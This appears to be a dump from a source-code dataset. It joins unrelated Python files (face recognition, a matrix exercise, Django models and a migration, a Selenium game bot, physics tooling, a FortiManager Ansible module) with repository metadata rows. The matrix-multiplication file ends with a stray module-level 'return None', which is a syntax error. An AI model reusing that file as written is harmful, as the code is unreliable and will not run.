    :param group_id: group name; used as the file name under ``config.DIR_DATA``.
    :return: dict mapping face_id -> face encoding.
    """
    path = os.path.join(config.DIR_DATA, group_id)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    if not os.path.exists(path):
        # Initialize an empty repository so the load below always succeeds.
        with open(path, 'wb') as f:
            pickle.dump({}, f)
    # Context manager closes the handle deterministically (the original
    # left ``open(path, 'rb')`` unclosed).
    with open(path, 'rb') as f:
        return pickle.load(f)
def write_data(group_id, face_id, face):
    """Write a face to a group repository.

    :param group_id: group whose repository file is updated.
    :param face_id: key under which the encoding is stored.
    :param face: face encoding to persist.
    """
    data = read_data(group_id)
    data[face_id] = face
    path = os.path.join(config.DIR_DATA, group_id)
    # Context manager closes the handle (the original leaked the file object).
    with open(path, 'wb') as f:
        pickle.dump(data, f)
def make_response(msg='', ok=True, data=None):
    """Build a JSON bottle ``Response``, logging the outcome to stderr."""
    status_word = 'Success' if ok else 'Fail'
    print('[{}] {}'.format(status_word, msg), file=sys.stderr)
    payload = dict(ok=ok, msg=msg)
    if data:
        print(data, file=sys.stderr)
        payload['data'] = data
    status_code = 200 if ok else 400
    return Response(
        json.dumps(payload),
        status=status_code,
        headers={'Content-Type': 'application/json'},
    )
def upload(group_id, face_id, path):
    """Register exactly one face from the image at ``path`` under the group.

    Fails when the image contains zero or more than one detected face.
    """
    # Parse the faces from the uploaded file
    image = face_recognition.load_image_file(path)
    faces = face_recognition.api.face_encodings(image, num_jitters=config.JITTERS)
    if len(faces) == 0:
        return make_response('No face detected.', False)
    elif len(faces) > 1:
        return make_response('More than one face detected.', False)
    # Exactly one face: persist its encoding under (group_id, face_id).
    write_data(group_id, face_id, faces[0])
    return make_response('Upload success: group_id={} face_id={}'.format(group_id, face_id))
def recognize(group_id, path, keys=None):
    """Match faces in the image at ``path`` against the group repository.

    :param group_id: group whose stored encodings are compared against.
    :param path: image file to analyze (at most 4 faces allowed).
    :param keys: optional whitelist of face ids to compare against;
        falsy means compare against every stored face.
    :return: a JSON response listing the matched face ids, or a failure
        response when no match / too many faces.
    """
    names = []
    faces = []
    # Collect the candidate encodings, optionally filtered by `keys`.
    for key, value in read_data(group_id).items():
        if not keys or key in keys:
            names.append(key)
            faces.append(value)
    # Parse the faces in the uploaded image
    image = face_recognition.load_image_file(path)
    matches = set()
    upload_faces = face_recognition.api.face_encodings(image, num_jitters=config.JITTERS)
    print('{} faces detected in the picture'.format(len(upload_faces)), file=sys.stderr)
    if len(upload_faces) > 4:
        return make_response('Too many faces in the picture', False)
    # Recognize the faces
    for face in upload_faces:
        results = face_recognition.compare_faces(faces, face, config.TOLERANCE)
        for name, success in zip(names, results):
            if success:
                matches.add(name)
    # Response
    if matches:
        return make_response('Matched {} faces.'.format(len(matches)), data=list(matches))
    else:
        return make_response('No matches.', False)
| [
"57082212@qq.com"
] | 57082212@qq.com |
d82167ca61a739e2d8c6919137e144a987ee22a3 | 70922de165319283d640821fd42ea1806da402c0 | /math/0x00-linear_algebra/8-ridin_bareback.py | 99e94b246997a78ccbb5d33ce5396ebf2ac47d12 | [] | no_license | ikki2530/holbertonschool-machine_learning | bdd8152d575a99281e2cce105cf87442ec07f2fb | 0b56aa0e92d65d4a5832cc994769834fbcfbe0ac | refs/heads/main | 2023-07-07T00:49:03.675328 | 2021-08-11T10:27:56 | 2021-08-11T10:27:56 | 317,352,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | #!/usr/bin/env python3
"""multiply 2 matrices"""
def matrix_shape(matrix):
    """Compute the shape of a (possibly nested) list matrix.

    :param matrix: matrix whose shape is calculated.
    :return: list of dimension sizes, e.g. ``[n, m]`` for an n x m matrix
        (``[]`` for a scalar).
    """
    shape = []
    # Walk down the first element of each nesting level; a non-list marks
    # the innermost (scalar) level. isinstance replaces the original
    # ``type(matrix) == list`` check.
    while isinstance(matrix, list):
        shape.append(len(matrix))
        if not matrix:
            # Empty axis: nothing deeper to inspect (the original recursion
            # crashed on ``matrix[0]`` here).
            break
        matrix = matrix[0]
    return shape
def mat_mul(mat1, mat2):
    """Perform 2D matrix multiplication.

    :param mat1: left operand, an n x k matrix (list of lists).
    :param mat2: right operand, a k x m matrix (list of lists).
    :return: the n x m product matrix, or None when the inner dimensions
        do not match.
    """
    # Inner dimensions must agree: columns of mat1 == rows of mat2.
    # (Replaces the original full matrix_shape() traversal -- only these
    # two lengths matter for the check.)
    if len(mat1[0]) != len(mat2):
        return None
    return [
        [
            sum(mat1[r][k] * mat2[k][c] for k in range(len(mat2)))
            for c in range(len(mat2[0]))
        ]
        for r in range(len(mat1))
    ]
return None
| [
"dagomez2530@gmail.com"
] | dagomez2530@gmail.com |
55bf4b302ed6ffdbe5175081e2ee071bd0c2e622 | 39d9ba65172cb170eab158ce732748f36eb5da02 | /dquora/messager/models.py | d9dddae4e288e02133b0cca5084d77be7ed5fc3a | [
"MIT"
] | permissive | adivxkk/Dquora | c3fec218922c33caebdf45211e63fa88e9e83f8b | 8e9f910eaab9fd109286572fd65b0918d93f83b9 | refs/heads/main | 2023-07-16T20:40:52.156804 | 2021-08-21T11:12:24 | 2021-08-21T11:12:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,635 | py | import uuid
from django.db import models
from django.contrib.auth import get_user_model
from django.conf import settings
class MessageQuerySet(models.query.QuerySet):
    """Custom QuerySet API for Message."""

    def get_conversation(self, sender, recipient):
        """Return the private-message conversation between two users."""
        qs_one = self.filter(sender=sender, recipient=recipient)  # messages A sent to B
        qs_two = self.filter(sender=recipient, recipient=sender)  # messages B sent to A
        return qs_one.union(qs_two).order_by('created_at')  # union, sorted by time; result is a QuerySet

    def get_most_recent_conversation(self, recipient):
        """Return the user who most recently exchanged messages with ``recipient``."""
        try:
            qs_sent = self.filter(sender=recipient)  # messages sent by the logged-in user
            qs_received = self.filter(recipient=recipient)  # messages received by the logged-in user
            qs = qs_sent.union(qs_received).latest("created_at")  # the latest message
            if qs.sender == recipient:
                # The logged-in user sent it: return the message's recipient.
                return qs.recipient
            # Otherwise return the message's sender.
            return qs.sender
        except self.model.DoesNotExist:
            # No model instance exists: fall back to the current user.
            return get_user_model().objects.get(username=recipient.username)
class Message(models.Model):
    """A private message between two users."""
    uuid_id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    # SET_NULL keeps the message when either account is deleted.
    sender = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='sent_messages', blank=True, null=True,
                               on_delete=models.SET_NULL, verbose_name='发送者')
    recipient = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='received_messages', blank=True, null=True,
                                  on_delete=models.SET_NULL, verbose_name='接受者')
    message = models.TextField(blank=True, null=True, verbose_name='内容')
    unread = models.BooleanField(default=True, verbose_name='是否未读')  # True means unread
    created_at = models.DateTimeField(db_index=True, auto_now_add=True,
                                      verbose_name='创建时间')  # no updated_at: a sent message cannot be edited or recalled

    objects = MessageQuerySet.as_manager()

    class Meta:
        verbose_name = '私信'
        verbose_name_plural = verbose_name
        ordering = ('-created_at',)

    def __str__(self):
        return self.message

    def mark_as_read(self):
        # Flip and persist only when the message is still unread.
        if self.unread:
            self.unread = False
            self.save()
| [
"xlyjxkk@gmail.com"
] | xlyjxkk@gmail.com |
0d5b9fa22ce5bdb993ac375103383a9c6ba6c959 | 167c6226bc77c5daaedab007dfdad4377f588ef4 | /python/ql/test/2/library-tests/modules/general/package/__init__.py | d5be97cd18230f5a4a71a5e875574face58adfb1 | [
"MIT",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-other-copyleft",
"GPL-1.0-or-later",
"LicenseRef-scancode-free-unknown",
"Python-2.0"
] | permissive | github/codeql | 1eebb449a34f774db9e881b52cb8f7a1b1a53612 | d109637e2d7ab3b819812eb960c05cb31d9d2168 | refs/heads/main | 2023-08-20T11:32:39.162059 | 2023-08-18T14:33:32 | 2023-08-18T14:33:32 | 143,040,428 | 5,987 | 1,363 | MIT | 2023-09-14T19:36:50 | 2018-07-31T16:35:51 | CodeQL | UTF-8 | Python | false | false | 213 | py |
a = 1
b = 2
c = 3
#Implicit relative import
from helper import d
#Explicit relative import
from .helper import g
from .assistant import f
#This will be an implicit relative import (in Python 2)
import helper
| [
"mark@hotpy.org"
] | mark@hotpy.org |
ac83d2dffda56e4aa58e5269ad131cf6fc0edd88 | cc9a87e975546e2ee2957039cceffcb795850d4f | /venv/bin/pip | 5d0b1e4937781dd43907661fd781a3862fbd0277 | [] | no_license | CodeHunterDev/Belajar-Python | 304d3243801b91b3605d2b9bd09e49a30735e51b | 9dd2ffb556eed6b2540da19c5f206fedb218ae99 | refs/heads/master | 2023-03-19T22:12:46.330272 | 2020-02-04T08:02:00 | 2020-02-04T08:02:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | #!/home/adam/PyCharm/HelloAdamPython/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
# Copyright (c) 2020. Adam Arthur Faizal
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip any "-script.py(w)"/".exe" wrapper suffix so pip sees a clean
    # program name in argv[0], then exit with pip's return code.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
    )
| [
"adam.faizal.af6@gmail.com"
] | adam.faizal.af6@gmail.com | |
33762bb875c6b2c49a26c4748aa607e6b82072fc | 5f203dc298a40d47835882b9c3b37e93ebc015d6 | /mf/python/mknfold.py | 22c45920a9b53331b02fad5295461d2269f483b1 | [] | no_license | chan-y-park/ML-SGHMC | 6489e7f2808b849983d2b970bc2c471a61cd8a3f | 92d555b7360060eb452efd72e4493dac39412021 | refs/heads/master | 2020-05-07T18:18:13.601213 | 2019-04-15T06:58:20 | 2019-04-15T06:58:20 | 180,761,444 | 0 | 0 | null | 2019-04-11T09:41:04 | 2019-04-11T09:41:04 | null | UTF-8 | Python | false | false | 798 | py | #!/usr/bin/python
import sys
import random
if __name__ == '__main__':
    # Split a "uid iid score" ratings file into n folds: rows assigned to
    # the requested fold are marked as test (group flag 1), the rest as
    # train (0), written in a libsvm-like sparse format to fold<k>.txt.
    if len(sys.argv) < 3:
        print 'usage: <input> <fold> [nfold=5]'
        exit(-1)
    if len( sys.argv ) > 3:
        nfold = int( sys.argv[3] )
    else:
        nfold = 5
    fold = int( sys.argv[2] )
    assert fold > 0 and fold <= nfold
    # Fixed seed keeps the fold assignment reproducible across runs.
    random.seed( 0 )
    fo = open( 'fold%d.txt' % fold, 'w' )
    for l in open( sys.argv[1] ):
        arr = l.split()
        uid,iid, sc = int(arr[0]),int(arr[1]), float(arr[2])
        if random.randint( 1, nfold ) == fold:
            # test is 1
            ngf = 1
        else:
            ngf = 0
        # score, group flag, then two constant weight columns.
        fo.write('%f\t%d\t1\t1\t' % (sc, ngf ) )
        if ngf != 0:
            fo.write('0:0 ')
        # One-hot user and item feature indices.
        fo.write('%d:1 %d:1\n' %(uid,iid))
    fo.close()
| [
"tianqi.tchen@gmail.com"
] | tianqi.tchen@gmail.com |
8db6e99710b0007055e3d7632b4842e47cc1c628 | 2b358820cb483cb73842f6b5c3fa4de5ff0d537a | /build/rviz_plugin_covariance/catkin_generated/pkg.develspace.context.pc.py | 686ad90ee3512882d5e1b9240485a1b2508a51d2 | [] | no_license | jrr1984/tp_final_omni | bf2803b75c5713c8e91a46126f0e281efcdca813 | 10ffb784397025839cc7cbd57d5991a1fbf32367 | refs/heads/master | 2021-06-06T01:59:57.602069 | 2021-05-08T19:13:30 | 2021-05-08T19:13:30 | 127,978,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rviz_plugin_covariance"
PROJECT_SPACE_DIR = "/home/juan/catkin_ws/devel/.private/rviz_plugin_covariance"
PROJECT_VERSION = "0.1.0"
| [
"juanreto@gmail.com"
] | juanreto@gmail.com |
12e1b5d0adfaa938385583586815b054f90b1494 | 6c92a0d1cf4e79a1f7a5d883184b397625e957be | /Day048/Cookie Clicker Practice.py | 880b23f9cad787f17b60b491ebd65386da0da3ef | [] | no_license | Hasib104/Learning-Python | 5667c52e98812da36275412a481298f4b38f8099 | 0f731624fb6572fdfbb0d09d2aa1ffb3d3247796 | refs/heads/main | 2023-03-26T18:33:35.168018 | 2021-03-18T13:25:36 | 2021-03-18T13:25:36 | 327,512,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,463 | py |
from selenium import webdriver
import time
# Path to the local ChromeDriver binary used by selenium.
chrome_driver_path = "C:\Development\chromedriver.exe"
driver = webdriver.Chrome(chrome_driver_path)
driver.get("http://orteil.dashnet.org/experiments/cookie/")

# Get cookie to click on.
cookie = driver.find_element_by_id("cookie")

# Get upgrade item ids.
items = driver.find_elements_by_css_selector("#store div")
item_ids = [item.get_attribute("id") for item in items]
#print(item_ids)

# Next moment to attempt a purchase, and the total 5-minute play budget.
timeout = time.time() + 3
five_min = time.time() + 60 * 5

while True:
    cookie.click()
    #finding money and making is int()
    money = driver.find_element_by_css_selector("#game #money")
    money_text_int = int(money.text)
    #print(money_text_int)
    prices = []
    # Every few seconds, scan the store and buy the priciest affordable upgrade.
    if time.time() > timeout:
        #finding all the prices for upgrades
        finding_all_prices_tag = driver.find_elements_by_css_selector("#store b")
        #splitting the prices from names
        for price in finding_all_prices_tag:
            all_prices_tag_text = price.text
            if all_prices_tag_text != "":
                just_price_int = int(all_prices_tag_text.split("-")[1].strip().replace(",", ""))
                prices.append(just_price_int)
        #print(prices)
        #making a dictionary for upgrades price : id
        cookie_upgrades = {}
        for i in range(len(prices)):
            cookie_upgrades[prices[i]] = item_ids[i]
        #print(cookie_upgrades)
        #making a dictionary for affordable upgrades
        # affordable_upgrades = {}
        # for cost, id in cookie_upgrades.items():
        #     if money_text_int > cost:
        #         affordable_upgrades[cost] = id
        # #print(affordable_upgrades)
        affordable_upgrades = {cost:id for (cost,id) in cookie_upgrades.items() if money_text_int > cost}
        #buying the highest upgrade
        highest_upgrade = max(affordable_upgrades)
        highest_upgrade_id = affordable_upgrades[highest_upgrade]
        driver.find_element_by_id(highest_upgrade_id).click()
        #adding a timeout so that the code doesnt crash(highest_upgrade = max(affordable_upgrades) \nValueError: max() arg is an empty sequence), this helps the game's score to increase.
        timeout = time.time() + 3
    # After five minutes, report the cookies-per-second score and stop.
    if time.time() > five_min:
        cps = driver.find_element_by_css_selector("#game #cps").text
        print(cps)
        break
| [
"noreply@github.com"
] | Hasib104.noreply@github.com |
fdc4ec77c6a13586c430aa41fa72288ca3ad27f2 | 07e3e716cd5ae33f5c88c40ede090645a723db9f | /backend/home/migrations/0002_load_initial_data.py | 7626e1b98d0c44979567332c51672739b0aef63f | [] | no_license | crowdbotics-apps/dating-22486 | bb8886a455d581b0c27cef8395c8369bc85fae72 | 1bb68c3095ffc29e5cd330cf426b9b1e35c2c360 | refs/heads/master | 2023-01-06T16:43:18.990380 | 2020-11-10T19:00:28 | 2020-11-10T19:00:28 | 311,755,200 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,278 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
    """Seed the initial CustomText row titled "dating"."""
    custom_text_model = apps.get_model("home", "CustomText")
    custom_text_model.objects.create(title="dating")
def create_homepage(apps, schema_editor):
    """Seed the initial HomePage row with the default landing-page markup."""
    HomePage = apps.get_model("home", "HomePage")
    homepage_body = """
<h1 class="display-4 text-center">dating</h1>
<p class="lead">
This is the sample application created and deployed from the Crowdbotics app.
You can view list of packages selected for this application below.
</p>"""
    HomePage.objects.create(body=homepage_body)
def create_site(apps, schema_editor):
    """Point the default django.contrib.sites Site (pk=1) at the app domain."""
    site_model = apps.get_model("sites", "Site")
    custom_domain = "dating-22486.botics.co"
    defaults = {"name": "dating"}
    if custom_domain:
        defaults["domain"] = custom_domain
    site_model.objects.update_or_create(defaults=defaults, id=1)
class Migration(migrations.Migration):
    # Runs after the home app's initial schema and after the sites framework
    # migration that makes domains unique.
    dependencies = [
        ("home", "0001_initial"),
        ("sites", "0002_alter_domain_unique"),
    ]

    # Data seeding only -- no schema changes.
    operations = [
        migrations.RunPython(create_customtext),
        migrations.RunPython(create_homepage),
        migrations.RunPython(create_site),
    ]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
4752f1bf9ae6ca9a6d4829ac7312e28b36909a17 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/TileCalorimeter/TileConditions/share/convertTimingResiduals.py | a83e68743fe1d4bb285589af690757802de92f78 | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,343 | py | #!/usr/bin/env python
import sys
#
#__________________________________________________________________
def dec2hex(n):
    """Return the last two uppercase hex digits of *n*, zero-padded."""
    return format(n, "02X")[-2:]
#
#__________________________________________________________________
def pmt2channel_LB(pmtOrChannel):
    """Convert channel number to pmt number, or pmt to channel.

    Valid for the Barrel only. The mapping is the identity for 0-23 and
    reverses each group of three above 23, so it is its own inverse.
    """
    value = int(pmtOrChannel)
    if value <= 23:
        # pmt == channel for pmt 0 - 23
        return value
    # pmt 24 - 47: swap the first and last entry of each group of three.
    remainder = value % 3
    if remainder == 0:
        return value + 2
    if remainder == 2:
        return value - 2
    return value
#
#__________________________________________________________________
# Partition prefix (LBA/LBC/EBA/EBC) -> hexadecimal fragment prefix.
modToFrag = {'LBA' : '0x1',
             'LBC' : '0x2',
             'EBA' : '0x3',
             'EBC' : '0x4'}

inFile = sys.argv[1]

# Accumulated output for the drawer-level (tdlas) and channel-level (tclas)
# timing constant files.
tdlas = ""
tclas = ""

# Input format per line: <MODxx> <drawerOffset> <chanOffset0> ... <chanOffset47>
lines = open(inFile,"r").readlines()
for line in lines:
    field = line.split()
    if not len(field): continue
    module = field[0][:3]
    modNum = int(field[0][3:]) - 1
    drawerOffset = float(field[1])
    chanOffsets = field[2:]
    hexModule = modToFrag[module] + dec2hex(modNum)
    #=== some sanity checks
    sum=0.
    for chan in xrange(6):
        add = float(chanOffsets[chan])
        sum += add
    print "%s ---> Found %i channels, sum of first 6 is %f" % ( field[0] , len(chanOffsets) , sum )
    #====================================================
    #=== fill tdlas (channel is always 0)
    #====================================================
    tdlas = tdlas+ "Tdlas\t%s\t0\t%s\n" % (hexModule,drawerOffset)
    #====================================================
    #=== fill tclas
    #====================================================
    for chan in xrange(48):
        offset = chanOffsets[chan]
        tclas = tclas+"Tclas\t%s\t%i\t%s\t%s\n" % (hexModule,chan,offset,offset)

# Write the two output files.
tdlasFile = open("Tile.tdlas","w")
tdlasFile.write(tdlas)
tdlasFile.close()

tclasFile = open("Tile.tclas","w")
tclasFile.write(tclas)
tclasFile.close()

# print "---------------TDLAS--------------------------"
# print tdlas
# print "---------------TDLAS--------------------------"
# print "---------------TCLAS--------------------------"
# print tclas
# print "---------------TCLAS--------------------------"
| [
"rushioda@lxplus754.cern.ch"
] | rushioda@lxplus754.cern.ch |
25b411769db49eeb1daa8e3f8b2a2e386e5fe43f | c5a1c95e9d8ce937f71caf8340cf11fe98e64f56 | /day10(주말용)/problem1/[이재형] 내적.py | 02fda70a817433911e1f4e125aee46026c8811d4 | [] | no_license | Boot-Camp-Coding-Test/Programmers | 963e5ceeaa331d99fbc7465f7b129bd68e96eae3 | 83a4b62ba2268a47859a6ce88ae1819bc96dcd85 | refs/heads/main | 2023-05-23T08:21:57.398594 | 2021-06-12T16:39:21 | 2021-06-12T16:39:21 | 366,589,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71 | py | def solution(a, b):
return sum([a[i]*b[i] for i in range(len(a))])
| [
"noreply@github.com"
] | Boot-Camp-Coding-Test.noreply@github.com |
cfa0e6c206169e8e5fed6ab2f5e5178f1c1e0c4f | fa52ee094776f69f0214ffbe24281a9736eaaa40 | /solutions/114_Flatten_Binary_Tree_to_Linked_List_1.py | b41a2f5011b771075bb35a38a3f043abb3f56591 | [] | no_license | hank08tw/CodeFromLeetcode | 57898916c2b903b1ecbc3d0ed063b36531d74e93 | 41b2936600dd392627a4f6e146559739bb88da45 | refs/heads/master | 2021-05-03T04:26:28.239904 | 2015-06-07T17:31:06 | 2015-06-07T17:31:06 | 120,615,373 | 1 | 0 | null | 2018-02-07T12:58:40 | 2018-02-07T12:58:39 | null | UTF-8 | Python | false | false | 615 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    # @param {TreeNode} root
    # @return {void} Do not return anything, modify root in-place instead.
    def flatten(self, root):
        """Flatten the tree rooted at ``root`` into a right-skewed list in place.

        After the call every node's ``left`` is None and ``right`` points to the
        next node in preorder. Iterative; the explicit stack holds right
        subtrees postponed while the left spine is being spliced in.
        """
        stack = []
        p = root
        # Invariant: whenever the stack is non-empty, p is a real node (a
        # postponed right child always replaces p.right before p advances),
        # so the attribute accesses below are safe.
        while p is not None or stack:
            if p.right:
                # Postpone the right subtree; it is visited after the left one.
                stack.append(p.right)
            if p.left:
                # Splice the left subtree into the right slot (preorder next).
                p.right = p.left
                p.left = None
            elif stack:
                # No left child: resume with the most recently postponed subtree.
                p.right = stack.pop()
            p = p.right
"yao.zhao9101@gmail.com"
] | yao.zhao9101@gmail.com |
0cae18a0b4188b84fe1ab8042cdc71443356abbe | 81c344b8df43ed550cb9496c664a8de2687eda3e | /venv/lib/python3.8/site-packages/ansible_collections/fortinet/fortimanager/plugins/modules/fmgr_antivirus_profile.py | 333628df60a3061b91a0b9e48611252ed8864ca9 | [] | no_license | anhdoan-ntt/cisco-aci | dc0e52b6d19ee0bafb2b24e0febe955952bf39ef | 185be6d6f13eabd65fb0ff328ea54f6507ccf0d4 | refs/heads/main | 2022-12-20T00:07:27.465096 | 2020-10-05T08:15:29 | 2020-10-05T08:15:29 | 300,500,699 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 16,249 | py | #!/usr/bin/python
from __future__ import absolute_import, division, print_function
# Copyright 2019-2020 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
# Standard Ansible module metadata: maturity level and support channel.
ANSIBLE_METADATA = {'status': ['preview'],
                    'supported_by': 'community',
                    'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fmgr_antivirus_profile
short_description: Configure AntiVirus profiles.
description:
- This module is able to configure a FortiManager device by allowing the
user to [ add get set update ] the following apis.
- /pm/config/adom/{adom}/obj/antivirus/profile
- /pm/config/global/obj/antivirus/profile
- Examples include all parameters and values need to be adjusted to data sources before usage.
version_added: "2.10"
author:
- Frank Shen (@fshen01)
- Link Zheng (@zhengl)
notes:
- There are only three top-level parameters where 'method' is always required
while other two 'params' and 'url_params' can be optional
- Due to the complexity of fortimanager api schema, the validation is done
out of Ansible native parameter validation procedure.
    - The syntax of OPTIONS does not comply with the standard Ansible argument
specification, but with the structure of fortimanager API schema, we need
a trivial transformation when we are filling the ansible playbook
options:
loose_validation:
description:
- Do parameter validation in a loose way
type: bool
required: false
workspace_locking_adom:
description:
- the adom name to lock in case FortiManager running in workspace mode
- it can be global or any other custom adom names
required: false
type: str
workspace_locking_timeout:
description:
- the maximum time in seconds to wait for other user to release the workspace lock
required: false
type: int
default: 300
method:
description:
- The method in request
required: true
type: str
choices:
- add
- get
- set
- update
params:
description:
- The parameters for each method
- See full parameters list in https://ansible-galaxy-fortimanager-docs.readthedocs.io/en/latest
type: list
required: false
url_params:
description:
- The parameters for each API request URL
- Also see full URL parameters in https://ansible-galaxy-fortimanager-docs.readthedocs.io/en/latest
required: false
type: dict
'''
EXAMPLES = '''
- hosts: fortimanager-inventory
collections:
- fortinet.fortimanager
connection: httpapi
vars:
ansible_httpapi_use_ssl: True
ansible_httpapi_validate_certs: False
ansible_httpapi_port: 443
tasks:
- name: REQUESTING /PM/CONFIG/OBJ/ANTIVIRUS/PROFILE
fmgr_antivirus_profile:
loose_validation: False
workspace_locking_adom: <value in [global, custom adom]>
workspace_locking_timeout: 300
method: <value in [add, set, update]>
url_params:
adom: <value in [none, global, custom dom]>
params:
-
data:
-
analytics-bl-filetype: <value of string>
analytics-db: <value in [disable, enable]>
analytics-max-upload: <value of integer>
analytics-wl-filetype: <value of string>
av-block-log: <value in [disable, enable]>
av-virus-log: <value in [disable, enable]>
comment: <value of string>
extended-log: <value in [disable, enable]>
ftgd-analytics: <value in [disable, suspicious, everything]>
inspection-mode: <value in [proxy, flow-based]>
mobile-malware-db: <value in [disable, enable]>
name: <value of string>
replacemsg-group: <value of string>
scan-mode: <value in [quick, full]>
- name: REQUESTING /PM/CONFIG/OBJ/ANTIVIRUS/PROFILE
fmgr_antivirus_profile:
loose_validation: False
workspace_locking_adom: <value in [global, custom adom]>
workspace_locking_timeout: 300
method: <value in [get]>
url_params:
adom: <value in [none, global, custom dom]>
params:
-
attr: <value of string>
fields:
-
- <value in [analytics-bl-filetype, analytics-db, analytics-max-upload, ...]>
filter:
- <value of string>
get used: <value of integer>
loadsub: <value of integer>
option: <value in [count, object member, datasrc, ...]>
range:
- <value of integer>
sortings:
-
varidic.attr_name: <value in [1, -1]>
'''
RETURN = '''
url:
description: The full url requested
returned: always
type: str
sample: /sys/login/user
status:
description: The status of api request
returned: always
type: dict
data:
description: The payload returned in the request
type: dict
returned: always
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible_collections.fortinet.fortimanager.plugins.module_utils.common import FAIL_SOCKET_MSG
from ansible_collections.fortinet.fortimanager.plugins.module_utils.common import DEFAULT_RESULT_OBJ
from ansible_collections.fortinet.fortimanager.plugins.module_utils.common import FMGRCommon
from ansible_collections.fortinet.fortimanager.plugins.module_utils.common import FMGBaseException
from ansible_collections.fortinet.fortimanager.plugins.module_utils.fortimanager import FortiManagerHandler
def main():
    """Module entry point.

    Declares the JSON-RPC URL candidates and per-method request schemas for
    the antivirus-profile endpoint, validates the playbook parameters (body
    validation is skipped when ``loose_validation`` is enabled), sends the
    request over the persistent HTTPAPI connection, and exits with the
    FortiManager response.
    """
    # Candidate JSON-RPC URLs: per-ADOM scope and global scope.
    jrpc_urls = [
        '/pm/config/adom/{adom}/obj/antivirus/profile',
        '/pm/config/global/obj/antivirus/profile'
    ]

    # Parameters that may be substituted into the request URL.
    url_schema = [
        {
            'name': 'adom',
            'type': 'string'
        }
    ]

    # Request body schemas; 'method_mapping' at the bottom selects which
    # schema object applies to each top-level method.
    body_schema = {
        'schema_objects': {
            # Shared by add/set/update: the antivirus profile payload itself.
            'object0': [
                {
                    'name': 'data',
                    'api_tag': 0,
                    'type': 'array',
                    'items': {
                        'analytics-bl-filetype': {
                            'type': 'string'
                        },
                        'analytics-db': {
                            'type': 'string',
                            'enum': [
                                'disable',
                                'enable'
                            ]
                        },
                        'analytics-max-upload': {
                            'type': 'integer'
                        },
                        'analytics-wl-filetype': {
                            'type': 'string'
                        },
                        'av-block-log': {
                            'type': 'string',
                            'enum': [
                                'disable',
                                'enable'
                            ]
                        },
                        'av-virus-log': {
                            'type': 'string',
                            'enum': [
                                'disable',
                                'enable'
                            ]
                        },
                        'comment': {
                            'type': 'string'
                        },
                        'extended-log': {
                            'type': 'string',
                            'enum': [
                                'disable',
                                'enable'
                            ]
                        },
                        'ftgd-analytics': {
                            'type': 'string',
                            'enum': [
                                'disable',
                                'suspicious',
                                'everything'
                            ]
                        },
                        'inspection-mode': {
                            'type': 'string',
                            'enum': [
                                'proxy',
                                'flow-based'
                            ]
                        },
                        'mobile-malware-db': {
                            'type': 'string',
                            'enum': [
                                'disable',
                                'enable'
                            ]
                        },
                        'name': {
                            'type': 'string'
                        },
                        'replacemsg-group': {
                            'type': 'string'
                        },
                        'scan-mode': {
                            'type': 'string',
                            'enum': [
                                'quick',
                                'full'
                            ]
                        }
                    }
                },
                {
                    'type': 'string',
                    'name': 'url',
                    'api_tag': 0
                }
            ],
            # Used by get: query selectors (attr, fields, filter, ranges, ...).
            'object1': [
                {
                    'type': 'string',
                    'name': 'attr',
                    'api_tag': 0
                },
                {
                    'name': 'fields',
                    'api_tag': 0,
                    'type': 'array',
                    'items': {
                        'type': 'array',
                        'items': {
                            'type': 'string',
                            'enum': [
                                'analytics-bl-filetype',
                                'analytics-db',
                                'analytics-max-upload',
                                'analytics-wl-filetype',
                                'av-block-log',
                                'av-virus-log',
                                'comment',
                                'extended-log',
                                'ftgd-analytics',
                                'inspection-mode',
                                'mobile-malware-db',
                                'name',
                                'replacemsg-group',
                                'scan-mode'
                            ]
                        }
                    }
                },
                {
                    'name': 'filter',
                    'type': 'dict',
                    'dict': {
                        'type': 'array',
                        'items': {
                            'type': 'string',
                            'example': [
